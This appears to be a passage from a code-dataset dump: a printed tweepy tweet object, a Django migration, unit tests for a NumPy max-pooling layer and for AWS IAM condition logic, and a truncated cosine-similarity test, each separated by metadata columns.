}, protected = False, followers_count = 57, friends_count = 222, listed_count = 0, created_at = datetime.datetime(2016, 12, 22, 7, 58, 1), favourites_count = 1597, utc_offset = None, time_zone = None, geo_enabled = False, verified = False, statuses_count = 1017, lang = None, contributors_enabled = False, is_translator = False, is_translation_enabled = False, profile_background_color = 'F5F8FA', profile_background_image_url = None, profile_background_image_url_https = None, profile_background_tile = False, profile_image_url = 'http://pbs.twimg.com/profile_images/1148388633872875520/ySSTkr4Q_normal.jpg', profile_image_url_https = 'https://pbs.twimg.com/profile_images/1148388633872875520/ySSTkr4Q_normal.jpg', profile_banner_url = 'https://pbs.twimg.com/profile_banners/811843219315113984/1562632232', profile_link_color = '1DA1F2', profile_sidebar_border_color = 'C0DEED', profile_sidebar_fill_color = 'DDEEF6', profile_text_color = '333333', profile_use_background_image = True, has_extended_profile = True, default_profile = True, default_profile_image = False, following = False, follow_request_sent = False, notifications = False, translator_type = 'none'), geo = None, coordinates = None, place = None, contributors = None, retweeted_status = Status(_api = < tweepy.api.API object at 0x000001CE1B31E198 > , _json = {
'created_at': 'Fri Jul 12 17:03:09 +0000 2019',
'id': 1149725895483154432,
'id_str': '1149725895483154432',
'text': 'my alien after i rescue him from #Area51 https://t.co/2cpjcCexgg',
'truncated': False,
'entities': {
'hashtags': [{
'text': 'Area51',
'indices': [33, 40]
}],
'symbols': [],
'user_mentions': [],
'urls': [],
'media': [{
'id': 1149725663957573632,
'id_str': '1149725663957573632',
'indices': [41, 64],
'media_url': 'http://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'media_url_https': 'https://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'url': 'https://t.co/2cpjcCexgg',
'display_url': 'pic.twitter.com/2cpjcCexgg',
'expanded_url': 'https://twitter.com/Iesbianbecca/status/1149725895483154432/video/1',
'type': 'photo',
'sizes': {
'thumb': {
'w': 150,
'h': 150,
'resize': 'crop'
},
'small': {
'w': 680,
'h': 680,
'resize': 'fit'
},
'medium': {
'w': 720,
'h': 720,
'resize': 'fit'
},
'large': {
'w': 720,
'h': 720,
'resize': 'fit'
}
}
}]
},
'extended_entities': {
'media': [{
'id': 1149725663957573632,
'id_str': '1149725663957573632',
'indices': [41, 64],
'media_url': 'http://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'media_url_https': 'https://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'url': 'https://t.co/2cpjcCexgg',
'display_url': 'pic.twitter.com/2cpjcCexgg',
'expanded_url': 'https://twitter.com/Iesbianbecca/status/1149725895483154432/video/1',
'type': 'video',
'sizes': {
'thumb': {
'w': 150,
'h': 150,
'resize': 'crop'
},
'small': {
'w': 680,
'h': 680,
'resize': 'fit'
},
'medium': {
'w': 720,
'h': 720,
'resize': 'fit'
},
'large': {
'w': 720,
'h': 720,
'resize': 'fit'
}
},
'video_info': {
'aspect_ratio': [1, 1],
'duration_millis': 13000,
'variants': [{
'bitrate': 832000,
'content_type': 'video/mp4',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/vid/480x480/iB0faFJ4tTnMTK3p.mp4?tag=10'
}, {
'bitrate': 432000,
'content_type': 'video/mp4',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/vid/320x320/tIFHIqkUkl43zzRQ.mp4?tag=10'
}, {
'content_type': 'application/x-mpegURL',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/pl/7f3FKQFqvkCIyBK-.m3u8?tag=10'
}, {
'bitrate': 1280000,
'content_type': 'video/mp4',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/vid/720x720/yb_4FZmN-oJkFrDA.mp4?tag=10'
}]
},
'additional_media_info': {
'monetizable': False
}
}]
},
'metadata': {
'iso_language_code': 'en',
'result_type': 'recent'
},
'source': '<a href="http://twitter.com/download/iphone" rel="nofollow">Twitter for iPhone</a>',
'in_reply_to_status_id': None,
'in_reply_to_status_id_str': None,
'in_reply_to_user_id': None,
'in_reply_to_user_id_str': None,
'in_reply_to_screen_name': None,
'user': {
'id': 1148054049884921856,
'id_str': '1148054049884921856',
'name': 'yung gravy’s pr manager',
'screen_name': 'Iesbianbecca',
'location': 'she/her',
'description': 'becca + kelly',
'url': None,
'entities': {
'description': {
'urls': []
}
},
'protected': False,
'followers_count': 48,
'friends_count': 52,
'listed_count': 0,
'created_at': 'Mon Jul 08 02:19:50 +0000 2019',
'favourites_count': 176,
'utc_offset': None,
'time_zone': None,
'geo_enabled': False,
'verified': False,
'statuses_count': 185,
'lang': None,
'contributors_enabled': False,
'is_translator': False,
'is_translation_enabled': False,
'profile_background_color': 'F5F8FA',
'profile_background_image_url': None,
'profile_background_image_url_https': None,
'profile_background_tile': False,
'profile_image_url': 'http://pbs.twimg.com/profile_images/1149741577583153152/nlrqvE20_normal.jpg',
'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1149741577583153152/nlrqvE20_normal.jpg',
'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1148054049884921856/1562951862',
'profile_link_color': '1DA1F2',
'profile_sidebar_border_color': 'C0DEED',
'profile_sidebar_fill_color': 'DDEEF6',
'profile_text_color': '333333',
'profile_use_background_image': True,
'has_extended_profile': True,
'default_profile': True,
'default_profile_image': False,
'following': False,
'follow_request_sent': False,
'notifications': False,
'translator_type': 'none'
},
'geo': None,
'coordinates': None,
'place': None,
'contributors': None,
'is_quote_status': False,
'retweet_count': 8853,
'favorite_count': 22422,
'favorited': False,
'retweeted': False,
'possibly_sensitive': False,
'lang': 'en'
}, created_at = datetime.datetime(2019, 7, 12, 17, 3, 9), id = 1149725895483154432, id_str = '1149725895483154432', text = 'my alien after i rescue him from #Area51 https://t.co/2cpjcCexgg', truncated = False, entities = {
'hashtags': [{
'text': 'Area51',
'indices': [33, 40]
}],
'symbols': [],
'user_mentions': [],
'urls': [],
'media': [{
'id': 1149725663957573632,
'id_str': '1149725663957573632',
'indices': [41, 64],
'media_url': 'http://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'media_url_https': 'https://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'url': 'https://t.co/2cpjcCexgg',
'display_url': 'pic.twitter.com/2cpjcCexgg',
'expanded_url': 'https://twitter.com/Iesbianbecca/status/1149725895483154432/video/1',
'type': 'photo',
'sizes': {
'thumb': {
'w': 150,
'h': 150,
'resize': 'crop'
},
'small': {
'w': 680,
'h': 680,
'resize': 'fit'
},
'medium': {
'w': 720,
'h': 720,
'resize': 'fit'
},
'large': {
'w': 720,
'h': 720,
'resize': 'fit'
}
}
}]
}, extended_entities = {
'media': [{
'id': 1149725663957573632,
'id_str': '1149725663957573632',
'indices': [41, 64],
'media_url': 'http://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'media_url_https': 'https://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'url': 'https://t.co/2cpjcCexgg',
'display_url': 'pic.twitter.com/2cpjcCexgg',
'expanded_url': 'https://twitter.com/Iesbianbecca/status/1149725895483154432/video/1',
'type': 'video',
'sizes': {
'thumb': {
'w': 150,
'h': 150,
'resize': 'crop'
},
'small': {
'w': 680,
'h': 680,
'resize': 'fit'
},
'medium': {
'w': 720,
'h': 720,
'resize': 'fit'
},
'large': {
'w': 720,
'h': 720,
'resize': 'fit'
}
},
'video_info': {
'aspect_ratio': [1, 1] | 55.290598 | 1,340 | 0.394207 | 3,616 | 51,752 | 5.388274 | 0.071073 | 0.029973 | 0.026535 | 0.02402 | 0.994508 | 0.993071 | 0.993071 | 0.993071 | 0.993071 | 0.990659 | 0 | 0.153332 | 0.500077 | 51,752 | 936 | 1,341 | 55.290598 | 0.59976 | 0 | 0 | 0.889128 | 0 | 0.041981 | 0.336379 | 0.049733 | 0 | 0 | 0.001394 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
99275f5e251f9df8c85e594278f0529ecab6c0fa | 3,987 | py | Python | business_register/migrations/0047_auto_20201112_1914.py | OlexandrTopuzov/Data_converter | 0ac2319ccaae790af35ab2202724c65d83d32ecc | [
"MIT"
] | null | null | null | business_register/migrations/0047_auto_20201112_1914.py | OlexandrTopuzov/Data_converter | 0ac2319ccaae790af35ab2202724c65d83d32ecc | [
"MIT"
] | null | null | null | business_register/migrations/0047_auto_20201112_1914.py | OlexandrTopuzov/Data_converter | 0ac2319ccaae790af35ab2202724c65d83d32ecc | [
"MIT"
] | null | null | null | # Generated by Django 3.0.7 on 2020-11-12 19:14
from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('business_register', '0046_auto_20201029_1328'),
    ]

    operations = [
        migrations.AddField(
            model_name='company',
            name='boss',
            field=models.CharField(blank=True, default='', max_length=100, null=True, verbose_name='керівник'),
        ),
        migrations.AddField(
            model_name='founder',
            name='is_beneficiary',
            field=models.BooleanField(blank=True, default=False, verbose_name='є бенефіціаром'),
        ),
        migrations.AddField(
            model_name='founder',
            name='is_founder',
            field=models.BooleanField(blank=True, default=False, verbose_name='є офіційним засновником'),
        ),
        migrations.AddField(
            model_name='historicalcompany',
            name='boss',
            field=models.CharField(blank=True, default='', max_length=100, null=True, verbose_name='керівник'),
        ),
        migrations.AddField(
            model_name='historicalfounder',
            name='is_beneficiary',
            field=models.BooleanField(blank=True, default=False, verbose_name='є бенефіціаром'),
        ),
        migrations.AddField(
            model_name='historicalfounder',
            name='is_founder',
            field=models.BooleanField(blank=True, default=False, verbose_name='є офіційним засновником'),
        ),
        migrations.AlterField(
            model_name='company',
            name='code',
            field=models.CharField(db_index=True, max_length=510),
        ),
        migrations.AlterField(
            model_name='company',
            name='registration_date',
            field=models.DateField(null=True, verbose_name='дата реєстрації'),
        ),
        migrations.AlterField(
            model_name='founder',
            name='address',
            field=models.CharField(blank=True, default='', max_length=2015, null=True, verbose_name='адреса'),
        ),
        migrations.AlterField(
            model_name='founder',
            name='edrpou',
            field=models.CharField(blank=True, db_index=True, default='', max_length=9, null=True, verbose_name='код ЄДРПОУ'),
        ),
        migrations.AlterField(
            model_name='founder',
            name='equity',
            field=models.FloatField(blank=True, null=True, verbose_name='участь в статутному капіталі'),
        ),
        migrations.AlterField(
            model_name='founder',
            name='name',
            field=models.TextField(db_index=True, verbose_name="назва/повне ім'я"),
        ),
        migrations.AlterField(
            model_name='historicalcompany',
            name='code',
            field=models.CharField(db_index=True, max_length=510),
        ),
        migrations.AlterField(
            model_name='historicalcompany',
            name='registration_date',
            field=models.DateField(null=True, verbose_name='дата реєстрації'),
        ),
        migrations.AlterField(
            model_name='historicalfounder',
            name='address',
            field=models.CharField(blank=True, default='', max_length=2015, null=True, verbose_name='адреса'),
        ),
        migrations.AlterField(
            model_name='historicalfounder',
            name='edrpou',
            field=models.CharField(blank=True, db_index=True, default='', max_length=9, null=True, verbose_name='код ЄДРПОУ'),
        ),
        migrations.AlterField(
            model_name='historicalfounder',
            name='equity',
            field=models.FloatField(blank=True, null=True, verbose_name='участь в статутному капіталі'),
        ),
        migrations.AlterField(
            model_name='historicalfounder',
            name='name',
            field=models.TextField(db_index=True, verbose_name="назва/повне ім'я"),
        ),
    ]
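
# The migration is applied with the standard Django workflow; nothing here is
# project-specific beyond the app label and migration prefix:
#   python manage.py migrate business_register 0047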
| 38.336538 | 126 | 0.591673 | 386 | 3,987 | 5.96114 | 0.209845 | 0.070404 | 0.078227 | 0.151239 | 0.901347 | 0.901347 | 0.817905 | 0.797045 | 0.797045 | 0.797045 | 0 | 0.018629 | 0.286431 | 3,987 | 103 | 127 | 38.708738 | 0.790158 | 0.011287 | 0 | 0.927835 | 1 | 0 | 0.162437 | 0.005838 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.010309 | 0 | 0.041237 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
99296707f747fc570de756993dd3bc5bb8592eee | 163 | py | Python | cpyquickhelper/parallel/__init__.py | sdpython/cpyquickhelper | c2bdebad2201c7e10a5999a836bbf53e27b963c7 | [
"MIT"
] | 2 | 2017-10-03T20:39:13.000Z | 2019-02-06T15:24:04.000Z | cpyquickhelper/parallel/__init__.py | sdpython/cpyquickhelper | c2bdebad2201c7e10a5999a836bbf53e27b963c7 | [
"MIT"
] | 21 | 2017-09-17T11:14:04.000Z | 2021-01-01T13:24:20.000Z | cpyquickhelper/parallel/__init__.py | sdpython/cpyquickhelper | c2bdebad2201c7e10a5999a836bbf53e27b963c7 | [
"MIT"
] | null | null | null | """
@file
@brief Shortcut to *parallel*.
"""
from .threader import kill_thread # pylint: disable=E0611
from .threadhelper import KThread # pylint: disable=E0611
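
# Re-exporting here lets callers use the shorter package path, e.g.:
#   from cpyquickhelper.parallel import kill_thread, KThread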
| 23.285714 | 58 | 0.742331 | 20 | 163 | 6 | 0.75 | 0.216667 | 0.3 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057143 | 0.141104 | 163 | 6 | 59 | 27.166667 | 0.8 | 0.496933 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
994401a0b77312c76f306e31b445a31086f535d4 | 6,978 | py | Python | 01_mysteries_of_neural_networks/06_numpy_convolutional_neural_net/tests/layers/unit_tests/test_pooling.py | angliu-bu/ILearnDeepLearning.py | 12819d6c32735a2d7277097e712adb04bd766081 | [
"MIT"
] | 1,093 | 2018-09-07T07:15:29.000Z | 2022-03-09T16:40:42.000Z | 01_mysteries_of_neural_networks/06_numpy_convolutional_neural_net/tests/layers/unit_tests/test_pooling.py | angliu-bu/ILearnDeepLearning.py | 12819d6c32735a2d7277097e712adb04bd766081 | [
"MIT"
] | 30 | 2018-09-20T02:41:40.000Z | 2022-02-10T01:37:19.000Z | 01_mysteries_of_neural_networks/06_numpy_convolutional_neural_net/tests/layers/unit_tests/test_pooling.py | angliu-bu/ILearnDeepLearning.py | 12819d6c32735a2d7277097e712adb04bd766081 | [
"MIT"
] | 456 | 2018-09-09T19:14:16.000Z | 2022-03-18T16:34:53.000Z | import numpy as np
from src.layers.pooling import MaxPoolLayer


class TestMaxPoolLayer:

    def test_forward_pass_single_channel_single_item(self):
        # given
        pool_size = (2, 2)
        stride = 2
        activation = np.array([[
            [[1], [2], [2], [1]],
            [[3], [4], [0], [0]],
            [[5], [2], [1], [1]],
            [[3], [4], [0], [3]]
        ]])
        expected_result = np.array([[
            [[4], [2]],
            [[5], [3]],
        ]])

        # when
        layer = MaxPoolLayer(pool_size=pool_size, stride=stride)
        result = layer.forward_pass(activation, training=True)

        # then
        assert result.shape == (1, 2, 2, 1)
        assert np.alltrue(expected_result == result)

    def test_forward_pass_two_channels_single_item(self):
        # given
        pool_size = (2, 2)
        stride = 2
        activation = np.array([[
            [[1, 5], [2, 2], [2, 2], [1, 1]],
            [[3, 3], [4, 4], [0, 3], [0, 0]],
            [[5, 2], [2, 2], [1, 1], [1, 1]],
            [[3, 3], [4, 4], [0, 2], [3, 0]]
        ]])
        expected_result = np.array([[
            [[4, 5], [2, 3]],
            [[5, 4], [3, 2]]
        ]])

        # when
        layer = MaxPoolLayer(pool_size=pool_size, stride=stride)
        result = layer.forward_pass(activation, training=True)

        # then
        assert result.shape == (1, 2, 2, 2)
        assert np.alltrue(expected_result == result)

    def test_forward_pass_single_channel_two_items(self):
        # given
        pool_size = (2, 2)
        stride = 2
        activation = np.array([
            [
                [[1], [2], [2], [1]],
                [[3], [4], [0], [0]],
                [[5], [2], [1], [1]],
                [[3], [4], [0], [3]]
            ],
            [
                [[5], [2], [2], [1]],
                [[3], [4], [3], [0]],
                [[2], [2], [1], [1]],
                [[3], [4], [2], [0]]
            ]
        ])
        expected_result = np.array([
            [
                [[4], [2]],
                [[5], [3]]
            ],
            [
                [[5], [3]],
                [[4], [2]]
            ]
        ])

        # when
        layer = MaxPoolLayer(pool_size=pool_size, stride=stride)
        result = layer.forward_pass(activation, training=True)

        # then
        assert result.shape == (2, 2, 2, 1)
        assert np.alltrue(expected_result == result)

    def test_backward_pass_single_channel_single_item(self):
        # given
        pool_size = (2, 2)
        stride = 2
        forward_activation = np.array([[
            [[1], [2], [2], [1]],
            [[3], [4], [0], [0]],
            [[5], [2], [1], [1]],
            [[3], [4], [0], [3]]
        ]])
        backward_activation = np.array([[
            [[3], [1]],
            [[8], [2]],
        ]])
        expected_backward_result = np.array([[
            [[0], [0], [1], [0]],
            [[0], [3], [0], [0]],
            [[8], [0], [0], [0]],
            [[0], [0], [0], [2]]
        ]])

        # when
        layer = MaxPoolLayer(pool_size=pool_size, stride=stride)
        _ = layer.forward_pass(forward_activation, training=True)
        backward_result = layer.backward_pass(backward_activation)

        # then
        assert np.alltrue(expected_backward_result == backward_result)

    def test_backward_pass_two_channels_single_item(self):
        # given
        pool_size = (2, 2)
        stride = 2
        forward_activation = np.array([[
            [[1, 5], [2, 2], [2, 2], [1, 1]],
            [[3, 3], [4, 4], [0, 3], [0, 0]],
            [[5, 2], [2, 2], [1, 1], [1, 1]],
            [[3, 3], [4, 4], [0, 2], [3, 0]]
        ]])
        backward_activation = np.array([[
            [[7, 2], [4, 3]],
            [[1, 5], [2, 2]]
        ]])
        expected_backward_result = np.array([[
            [[0, 2], [0, 0], [4, 0], [0, 0]],
            [[0, 0], [7, 0], [0, 3], [0, 0]],
            [[1, 0], [0, 0], [0, 0], [0, 0]],
            [[0, 0], [0, 5], [0, 2], [2, 0]]
        ]])

        # when
        layer = MaxPoolLayer(pool_size=pool_size, stride=stride)
        _ = layer.forward_pass(forward_activation, training=True)
        backward_result = layer.backward_pass(backward_activation)

        # then
        assert np.alltrue(expected_backward_result == backward_result)

    def test_backward_pass_single_channel_two_items(self):
        # given
        pool_size = (2, 2)
        stride = 2
        forward_activation = np.array([
            [
                [[1], [2], [2], [1]],
                [[3], [4], [0], [0]],
                [[5], [2], [1], [1]],
                [[3], [4], [0], [3]]
            ],
            [
                [[5], [2], [2], [1]],
                [[3], [4], [3], [0]],
                [[2], [2], [1], [1]],
                [[3], [4], [2], [0]]
            ]
        ])
        backward_activation = np.array([
            [
                [[7], [2]],
                [[4], [3]]
            ],
            [
                [[1], [5]],
                [[2], [2]]
            ]
        ])
        expected_backward_result = np.array([
            [
                [[0], [0], [2], [0]],
                [[0], [7], [0], [0]],
                [[4], [0], [0], [0]],
                [[0], [0], [0], [3]]
            ],
            [
                [[1], [0], [0], [0]],
                [[0], [0], [5], [0]],
                [[0], [0], [0], [0]],
                [[0], [2], [2], [0]]
            ]
        ])

        # when
        layer = MaxPoolLayer(pool_size=pool_size, stride=stride)
        _ = layer.forward_pass(forward_activation, training=True)
        backward_result = layer.backward_pass(backward_activation)

        # then
        assert np.alltrue(expected_backward_result == backward_result)
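

# A minimal ad-hoc demo (not part of the original suite); it assumes only the
# MaxPoolLayer API exercised by the tests above.
if __name__ == '__main__':
    layer = MaxPoolLayer(pool_size=(2, 2), stride=2)
    demo = np.arange(16, dtype=float).reshape(1, 4, 4, 1)
    # 2x2 pooling with stride 2 halves each spatial dimension
    print(layer.forward_pass(demo, training=True).shape)  # -> (1, 2, 2, 1)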
| 24.921429 | 70 | 0.323015 | 634 | 6,978 | 3.394322 | 0.074132 | 0.04368 | 0.036245 | 0.037175 | 0.945632 | 0.938662 | 0.920539 | 0.908457 | 0.862454 | 0.857807 | 0 | 0.090274 | 0.507882 | 6,978 | 279 | 71 | 25.010753 | 0.536401 | 0.013614 | 0 | 0.632035 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038961 | 1 | 0.025974 | false | 0.064935 | 0.008658 | 0 | 0.038961 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
99791889d91594ce4a588e8ff5ce2892d48ae229 | 5,389 | py | Python | tests/unit/intersection/test_effective_condition.py | etta-trust/PolicyGlass | 72157189a9af3172e6efbdcc2050969796cfa99f | [
"MIT"
] | 49 | 2021-12-21T23:15:55.000Z | 2022-03-28T09:38:30.000Z | tests/unit/intersection/test_effective_condition.py | etta-trust/PolicyGlass | 72157189a9af3172e6efbdcc2050969796cfa99f | [
"MIT"
] | 3 | 2021-12-23T22:02:02.000Z | 2022-01-10T14:16:24.000Z | tests/unit/intersection/test_effective_condition.py | etta-trust/PolicyGlass | 72157189a9af3172e6efbdcc2050969796cfa99f | [
"MIT"
] | 1 | 2022-02-22T11:03:27.000Z | 2022-02-22T11:03:27.000Z | import pytest
from policyglass import Action, Condition, EffectiveCondition


def test_bad_intersection():
    with pytest.raises(ValueError) as ex:
        EffectiveCondition(
            frozenset({Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"])}), frozenset()
        ).intersection(Action("S3:*"))
    assert "Cannot intersect EffectiveCondition with Action" in str(ex.value)


INTERSECTION_SCENARIOS = {
    "proper_subset": {
        "first": EffectiveCondition(
            frozenset(
                {
                    Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"]),
                    Condition(key="s3:x-amz-server-side-encryption", operator="StringNotEquals", values=["AES256"]),
                }
            ),
            frozenset(),
        ),
        "second": EffectiveCondition(
            frozenset({Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"])}), frozenset()
        ),
        "result": EffectiveCondition(
            frozenset({Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"])}), frozenset()
        ),
    },
    "proper_subset_with_exclusions": {
        "first": EffectiveCondition(
            frozenset(
                {
                    Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"]),
                    Condition(key="s3:x-amz-server-side-encryption", operator="StringNotEquals", values=["AES256"]),
                }
            ),
            frozenset(),
        ),
        "second": EffectiveCondition(
            frozenset(
                {
                    Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"]),
                }
            ),
            frozenset({Condition(key="key", operator="BinaryEquals", values=["QmluYXJ5VmFsdWVJbkJhc2U2NA=="])}),
        ),
        "result": EffectiveCondition(
            frozenset(
                {
                    Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"]),
                }
            ),
            frozenset(),
        ),
    },
    # Commented out until we handle conditions that negate each other: the
    # exclusions of the first set won't negate the second, but a condition in
    # the first that negates a condition in the second will.
    # "excluded_proper_subset": {
    #     "first": EffectiveCondition(
    #         frozenset(
    #             {
    #                 Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"]),
    #                 Condition(key="s3:x-amz-server-side-encryption", operator="StringNotEquals", values=["AES256"]),
    #             }
    #         ),
    #         frozenset({Condition(key="key", operator="BinaryEquals", values=["QmluYXJ5VmFsdWVJbkJhc2U2NA=="])}),
    #     ),
    #     "second": EffectiveCondition(
    #         frozenset({Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"])}), frozenset()
    #     ),
    #     "result": None,
    # },
    "subset": {
        "first": EffectiveCondition(
            frozenset({Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"])}), frozenset()
        ),
        "second": EffectiveCondition(
            frozenset({Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"])}), frozenset()
        ),
        "result": EffectiveCondition(
            frozenset({Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"])}), frozenset()
        ),
    },
    "disjoint": {
        "first": EffectiveCondition(
            frozenset({Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"])}), frozenset()
        ),
        "second": EffectiveCondition(
            frozenset(
                {Condition(key="s3:x-amz-server-side-encryption", operator="StringNotEquals", values=["AES256"])}
            ),
            frozenset(),
        ),
        "result": EffectiveCondition(frozenset(), frozenset()),
    },
    "larger": {
        "first": EffectiveCondition(
            frozenset({Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"])}),
            frozenset(),
        ),
        "second": EffectiveCondition(
            frozenset(
                {
                    Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"]),
                    Condition(key="s3:x-amz-server-side-encryption", operator="StringNotEquals", values=["AES256"]),
                }
            ),
            frozenset(),
        ),
        "result": EffectiveCondition(
            frozenset({Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"])}),
            frozenset(),
        ),
    },
    # "larger_with_exclusion": {
    #     "first": EffectiveCondition(Action("S3:Get*")),
    #     "second": EffectiveCondition(
    #         frozenset(
    #             {
    #                 Condition("aws:PrincipalOrgId", "StringNotEquals", ["o-123456"]),
    #                 Condition(key="s3:x-amz-server-side-encryption", operator="StringNotEquals", values=["AES256"]),
    #             }
    #         ),
    #         frozenset(),
    #     ),
    #     "result": EffectiveCondition(Action("S3:Get*"), frozenset({Action("S3:GetObject")})),
    # },
}


@pytest.mark.parametrize("_, scenario", INTERSECTION_SCENARIOS.items())
def test_intersection(_, scenario):
    first, second, result = scenario.values()
    assert first.intersection(second) == result
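
# Each named scenario above becomes one parametrized case; a single scenario
# can be selected with standard pytest filtering, e.g.:
#   pytest -k proper_subset tests/unit/intersection/test_effective_condition.py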
| 38.769784 | 118 | 0.543515 | 387 | 5,389 | 7.529716 | 0.211886 | 0.123542 | 0.222375 | 0.227522 | 0.763555 | 0.763555 | 0.763555 | 0.763555 | 0.71757 | 0.688744 | 0 | 0.036218 | 0.30321 | 5,389 | 138 | 119 | 39.050725 | 0.739814 | 0.239562 | 0 | 0.64 | 0 | 0 | 0.254241 | 0.044505 | 0 | 0 | 0 | 0 | 0.02 | 1 | 0.02 | false | 0 | 0.02 | 0 | 0.04 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
41f2e92b3cc4382e966f2b904beae30eacad4050 | 505 | py | Python | modbus_client/gui/widgets/read_widgets/__init__.py | bronemos/Modbus_Client | 077ab1af76daaa76f4d428389baf2fc961f5af0b | [
"MIT"
] | null | null | null | modbus_client/gui/widgets/read_widgets/__init__.py | bronemos/Modbus_Client | 077ab1af76daaa76f4d428389baf2fc961f5af0b | [
"MIT"
] | null | null | null | modbus_client/gui/widgets/read_widgets/__init__.py | bronemos/Modbus_Client | 077ab1af76daaa76f4d428389baf2fc961f5af0b | [
"MIT"
] | null | null | null | from modbus_client.gui.widgets.read_widgets.read_coils_widget import ReadCoilsWidget
from modbus_client.gui.widgets.read_widgets.read_discrete_inputs_widget import ReadDiscreteInputsWidget
from modbus_client.gui.widgets.read_widgets.read_holding_registers_widget import ReadHoldingRegistersWidget
from modbus_client.gui.widgets.read_widgets.read_input_registers_widget import ReadInputRegistersWidget
| 84.166667 | 107 | 0.920792 | 64 | 505 | 6.890625 | 0.28125 | 0.249433 | 0.181406 | 0.21542 | 0.69161 | 0.69161 | 0.69161 | 0.69161 | 0.412698 | 0.412698 | 0 | 0 | 0.039604 | 505 | 5 | 108 | 101 | 0.909278 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
5100965c0bc6aa401caee2f75179cc83cd4968f7 | 2,902 | py | Python | tests/test_cosine.py | giantoak/dedupe | 9ab392510ee36dc2275fb59bde22a591c38bb83b | [
"MIT"
] | null | null | null | tests/test_cosine.py | giantoak/dedupe | 9ab392510ee36dc2275fb59bde22a591c38bb83b | [
"MIT"
] | null | null | null | tests/test_cosine.py | giantoak/dedupe | 9ab392510ee36dc2275fb59bde22a591c38bb83b | [
"MIT"
] | null | null | null | import unittest
from dedupe.distance.cosine import CosineSetSimilarity, CosineTextSimilarity
import numpy
import pickle


class TestSetCosineClass(unittest.TestCase):

    def setUp(self):
        self.ilist = [('a', 'b', 'c'),
                      ('b', 'c', 'd'),
                      ('d', 'e', 'f')]

    def test_cosine(self):
        cosine = CosineSetSimilarity(self.ilist)
        s1 = self.ilist[0]
